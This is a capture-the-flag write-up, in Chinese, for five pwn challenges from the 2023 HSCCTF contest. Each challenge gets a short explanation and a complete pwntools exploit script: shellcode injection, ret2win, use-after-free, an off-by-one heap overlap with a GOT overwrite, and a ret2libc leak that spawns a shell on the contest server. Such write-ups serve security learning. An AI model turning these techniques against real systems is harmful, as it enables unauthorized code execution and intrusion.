2023 HSCCTF Write Up

PWN By Comentropy

EZPWN

往可执行区域写入shellcode,栈溢出到shellcode地址,执行shellcode,(该地址在程序内被赋予了执行权限)

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# EZPWN exploit script. Per the writeup: shellcode is written into a region
# the binary itself marks executable, and a stack overflow redirects the saved
# return address to it (a non-executable data region would have blocked this).
# All I/O helpers (ELF/context, process/remote, init, ggdb, lg_update, s, sh)
# come from the author's pwntools wrapper module; their semantics are not shown here.
from ckyan.pwn.my_script import *

# local: 1 = run the binary locally, 0 = connect to the challenge service.
local = 0
# debug: 1 = verbose pwntools logging, and attach gdb when running locally.
debug = 1

binary = "./EZPWN"
elf = ELF(binary)

context.arch = elf.arch
context.os = elf.os
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "43.143.254.94"
    port = "10962"
    p = remote(ip, port)
    lib = "./libc.so.6"

libc = ELF(lib)
init(lib, binary, p)  # wrapper-module setup; what it does is not visible here

if debug and local:
    ggdb()

# name(obj): reverse-lookup the global variable bound to obj. It uses an identity
# check, so it is only reliable for values that exist as a single object
# (large ints such as addresses); small cached ints may resolve to the wrong name.
name   = lambda obj        : [name for name in globals() if globals()[name] is obj][0]
# lg(buf): log buf under its global variable name via the wrapper module.
lg     = lambda buf        : lg_update(name(buf), buf)


# Address the writeup says the program grants execute permission to; the payload
# is placed there and the saved return address is pointed at it.
shellcode_addr = 0x404080

pad = b''
pad += asm(shellcraft.sh())

# print(hex(len(pad)))

# Zero-pad to 0x118 bytes; per the writeup's stack-overflow description the
# following 8 bytes presumably overwrite the saved return address.
pad = pad.ljust(0x118, b'\x00')
pad += p64(shellcode_addr)

# ru(b'input:\n')

s(pad)

sh()

Morris II

栈溢出到后门即可。只是程序看着较为复杂。

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# Morris II exploit script. Per the writeup: a plain stack overflow into a
# backdoor function; the program only looks complicated. All I/O helpers
# (ELF/context, process/remote, init, ggdb, lg_update, ru, sl, s, sh) come
# from the author's pwntools wrapper module; their semantics are not shown here.
from ckyan.pwn.my_script import *

# local: 1 = run the binary locally, 0 = connect to the challenge service.
local = 0
# debug: 1 = verbose pwntools logging, and attach gdb when running locally.
debug = 1

binary = "./Morris_II"
elf = ELF(binary)

context.arch = elf.arch
context.os = elf.os
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "43.143.254.94"
    port = "10017"
    p = remote(ip, port)
    lib = "/mnt/hgfs/share/remote_libc/amd64/libc-2.31.so"

libc = ELF(lib)
init(lib, binary, p)  # wrapper-module setup; what it does is not visible here

if debug and local:
    ggdb()

# name(obj): reverse-lookup the global variable bound to obj (identity check,
# so only reliable for values that exist as a single object, e.g. large ints).
name   = lambda obj        : [name for name in globals() if globals()[name] is obj][0]
# lg(buf): log buf under its global variable name via the wrapper module.
lg     = lambda buf        : lg_update(name(buf), buf)

# Walk the program's prompts until the input that overflows is requested.
ru("from below")
sl("0")
ru(b'name!:\n')

# Distance from the input buffer to the saved return address; the 0x10 + 8 form
# presumably means a 0x10-byte buffer plus the saved frame pointer — confirm in the binary.
padding = 0x10 + 8
# Single `ret` gadget, presumably to keep the stack 16-byte aligned before
# entering the backdoor — TODO confirm against the binary.
ret = 0x40124E
# Address of the backdoor function the writeup refers to.
backdoor = 0x0401236

pad = b''
pad += b'a' * padding
pad += p64(ret)
pad += p64(backdoor)

s(pad)

sh()

EasyHeap

uaf修改函数地址为后门地址即可。

(设想,如果这个题没有后门呢,如果改函数地址为system地址,是无法调用到shell的,因为传的参数是其本身,所以如果一定要用这个方法的话,因为题目是32位,地址为4个字节占满的。所以可以修改system地址后面部分为字符串;sh\x00,这样前面不被system识别,后面是可执行的,无聊的猜想,未尝试,对错概不负责。)

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# EasyHeap exploit script (32-bit binary). Per the writeup: a use-after-free
# lets a note's function pointer be replaced with the backdoor address.
# All I/O helpers (ELF/context, process/remote, init, ggdb, lg_update, ru, sl,
# s, sh) come from the author's pwntools wrapper module; semantics not shown here.
from ckyan.pwn.my_script import *

# local: 1 = run the binary locally, 0 = connect to the challenge service.
local = 0
# debug: 1 = verbose pwntools logging, and attach gdb when running locally.
debug = 1

binary = "./easyHeap"
elf = ELF(binary)

context.arch = elf.arch
context.os = elf.os
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "43.143.254.94"
    port = "10945"
    p = remote(ip, port)
    lib = "/mnt/hgfs/share/remote_libc/amd64/libc-2.34.so"

libc = ELF(lib)
init(lib, binary, p)  # wrapper-module setup; what it does is not visible here

if debug and local:
    ggdb()

# name(obj): reverse-lookup the global variable bound to obj (identity check,
# so only reliable for values that exist as a single object, e.g. large ints).
name   = lambda obj        : [name for name in globals() if globals()[name] is obj][0]
# lg(buf): log buf under its global variable name via the wrapper module.
lg     = lambda buf        : lg_update(name(buf), buf)

def cmd(c):
    """Select menu option *c*: wait for the option prompt, then send it as a line."""
    option_prompt = b'Input Option: '
    ru(option_prompt)
    choice = str(c)
    sl(choice)

def add(size, content):
    """Menu option 1: allocate a note of *size* bytes and write *content* into it."""
    dialogue = (
        (b'Size: ', lambda: sl(str(size))),
        (b'Content: ', lambda: s(content)),
    )
    cmd(1)
    for prompt, answer in dialogue:
        ru(prompt)
        answer()

def free(idx):
    """Menu option 2: delete note *idx* (per the writeup the note stays reachable afterwards: UAF)."""
    cmd(2)
    ru(b'Note id: ')
    note_id = str(idx)
    sl(note_id)

def show(idx):
    """Menu option 3: display note *idx*."""
    cmd(3)
    ru(b'Note id: ')
    note_id = str(idx)
    sl(note_id)

# Backdoor function address (the target of the UAF overwrite in the writeup).
backdoor = 0x080495BD

add(0x20, b'aaaa')
add(0x20, b'aaaa')

free(0)
free(1)
# 1 -> 0
# (author's note above: the freelist hands back chunk 1 first, then chunk 0)

# Reclaim freed memory with an 8-byte note; per the writeup this overlaps a
# note's function-pointer slot, which is replaced with the backdoor address
# (32-bit binary, hence p32). Exact layout is inferred — confirm against the binary.
add(8, p32(backdoor))
# Note 0 was freed but is still reachable (the UAF); showing it presumably calls
# the replaced pointer. Clearing the pointer on free would have closed this.
show(0)

sh()

Dead Star Weapon Management System

该题是一血,off by one构造chunk extend and overlapping即可。

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# Dead Star Weapon Management System exploit script. Per the writeup: an
# off-by-one on the chunk size byte is used to extend a chunk and create
# overlapping allocations. All I/O helpers (ELF/context, process/remote, init,
# ggdb, lg_update, ru, sl, s, r7f, sh) come from the author's pwntools wrapper
# module; their semantics are not shown here.
from ckyan.pwn.my_script import *

# local: 1 = run the binary locally, 0 = connect to the challenge service.
local = 0
# debug: 1 = verbose pwntools logging, and attach gdb when running locally.
debug = 1

binary = "./deathstar_admin"
elf = ELF(binary)

context.arch = elf.arch
context.os = elf.os
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "43.143.254.94"
    port = "10638"
    p = remote(ip, port)
    lib = "./libc.so.6"

libc = ELF(lib)
init(lib, binary, p)  # wrapper-module setup; what it does is not visible here

if debug and local:
    ggdb()

# name(obj): reverse-lookup the global variable bound to obj (identity check,
# so only reliable for values that exist as a single object, e.g. large ints).
name   = lambda obj        : [name for name in globals() if globals()[name] is obj][0]
# lg(buf): log buf under its global variable name via the wrapper module.
lg     = lambda buf        : lg_update(name(buf), buf)

def cmd(c):
    """Select menu action *c*: wait for the action prompt, then send it as a line."""
    action_prompt = b'[?]choose an action:\n'
    ru(action_prompt)
    choice = str(c)
    sl(choice)

def add(size, content):
    """Menu action 1: create a weapon entry of *size* bytes holding *content*."""
    dialogue = (
        (b'weapon length:\n', lambda: sl(str(size))),
        (b'weapon detail:\n', lambda: s(content)),
    )
    cmd(1)
    for prompt, answer in dialogue:
        ru(prompt)
        answer()

def show(idx):
    """Menu action 2: display weapon entry *idx* (no prompt is awaited before the index)."""
    cmd(2)
    index = str(idx)
    sl(index)

def edit(idx, content):
    """Menu action 3: overwrite weapon entry *idx* with *content*."""
    dialogue = (
        (b'weapon index:\n', lambda: sl(str(idx))),
        (b'your additional info:\n', lambda: s(content)),
    )
    cmd(3)
    for prompt, answer in dialogue:
        ru(prompt)
        answer()

def free(idx):
    """Menu action 4: delete weapon entry *idx*."""
    cmd(4)
    ru(b'weapon index:\n')
    index = str(idx)
    sl(index)

add(0x18, b'aaaa') # 0
add(0x10, b'bbbb') # 1

# 0x18 bytes of zeros plus one extra byte: the 25th byte is the off-by-one the
# writeup describes, which presumably lands on the low byte of chunk 1's size
# field and enlarges it to 0x41 — confirm the layout against the binary.
pad1 = b''
pad1 += p64(0) * 2
pad1 += p64(0) + p8(0x41)
edit(0, pad1)

# Free the enlarged chunk so the next 0x30-byte request is served from it.
free(1)

# Refill the extended chunk: a forged 0x21 header for the memory that follows,
# then a (0x30, &free@GOT) pair. Per the writeup this overlaps another record,
# so show(1)/edit(1) below read and write through the GOT pointer — inferred,
# confirm against the binary.
pad2 = b''
pad2 += p64(0) * 2
pad2 += p64(0) + p64(0x21)
pad2 += p64(0x30) + p64(elf.got['free'])
add(0x30, pad2) # 1

show(1)

# r7f() presumably reads back a leaked 0x7f.. address — confirm in my_script.
free_addr = r7f()
lg(free_addr)
libc_base = free_addr - libc.sym['free']
# lg() returns something that is rebound to libc; libc.sym is used as an
# absolute address below, so it presumably returns the ELF rebased at
# libc_base — confirm in my_script.
libc = lg(libc_base)

# Overwrite free@GOT with system's address (partial RELRO would leave the GOT
# writable; full RELRO would have blocked this step).
pad3 = b''
pad3 += p64(libc.sym['system'])

edit(1, pad3)

add(0x10, b'/bin/sh\x00') # 2

# Freeing the "/bin/sh" entry now goes through the overwritten GOT slot.
free(2)

sh()

Safe Program

栈溢出拿shell即可。exp如下:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# Safe Program exploit script. Per the writeup: a stack overflow, done as a
# two-round ret2libc — round 1 leaks puts' libc address via puts@PLT and
# returns to main, round 2 calls system("/bin/sh"). All I/O helpers
# (ELF/context, process/remote, init, ggdb, lg_update, ru, s, r7f, sleep, sh)
# come from the author's pwntools wrapper module; semantics not shown here.
from ckyan.pwn.my_script import *
# from ckyan.pwn.my_libcsearch import *

# local: 1 = run the binary locally, 0 = connect to the challenge service.
local = 0
# debug: 1 = verbose pwntools logging, and attach gdb when running locally.
debug = 1

binary = "./Safe_Program"
elf = ELF(binary)

context.arch = elf.arch
context.os = elf.os
context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = "debug" if debug else "info"

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "43.143.254.94"
    port = "10868"
    p = remote(ip, port)
    lib = "/mnt/hgfs/share/remote_libc/amd64/libc-2.31.so"

libc = ELF(lib)
init(lib, binary, p)  # wrapper-module setup; what it does is not visible here

if debug and local:
    ggdb()

# name(obj): reverse-lookup the global variable bound to obj (identity check,
# so only reliable for values that exist as a single object, e.g. large ints).
name   = lambda obj        : [name for name in globals() if globals()[name] is obj][0]
# lg(buf): log buf under its global variable name via the wrapper module.
lg     = lambda buf        : lg_update(name(buf), buf)

# Distance from the input buffer to the saved return address; the 0x80 + 8 form
# presumably means a 0x80-byte buffer plus the saved frame pointer — confirm in the binary.
padding = 0x80 + 8
# `pop rdi; ret` gadget: loads the first call argument.
pop_rdi_ret = 0x401393
# Bare `ret` gadget, presumably for 16-byte stack alignment before system — confirm.
ret = 0x40101a
# Returning to main makes the program ask for input again for round 2.
main = 0x401247

# Round 1: puts(&puts@GOT) prints the resolved libc address of puts, then main.
pad1 = b''
pad1 += b'a' * padding
pad1 += p64(pop_rdi_ret)
pad1 += p64(elf.got['puts'])
pad1 += p64(elf.plt['puts'])
pad1 += p64(main)

ru(b'to me now:\n\n')
sleep(3)  # pause before sending; the reason is not visible here
s(pad1)

# r7f() presumably reads back a leaked 0x7f.. address — confirm in my_script.
puts_addr = r7f()
lg(puts_addr)

libc_base = puts_addr - libc.sym['puts']
# lg() returns something that is rebound to libc; libc.sym and libc.search are
# used as absolute addresses below, so it presumably returns the ELF rebased
# at libc_base — confirm in my_script.
libc = lg(libc_base)

# Round 2: system("/bin/sh") with the string taken from libc itself.
pad2 = b''
pad2 += b'a' * padding
pad2 += p64(ret)
pad2 += p64(pop_rdi_ret)
pad2 += p64(next(libc.search(b"/bin/sh\x00")))
pad2 += p64(libc.sym['system'])
pad2 += p64(main)

ru(b'to me now:\n\n')
sleep(3)
s(pad2)

sh()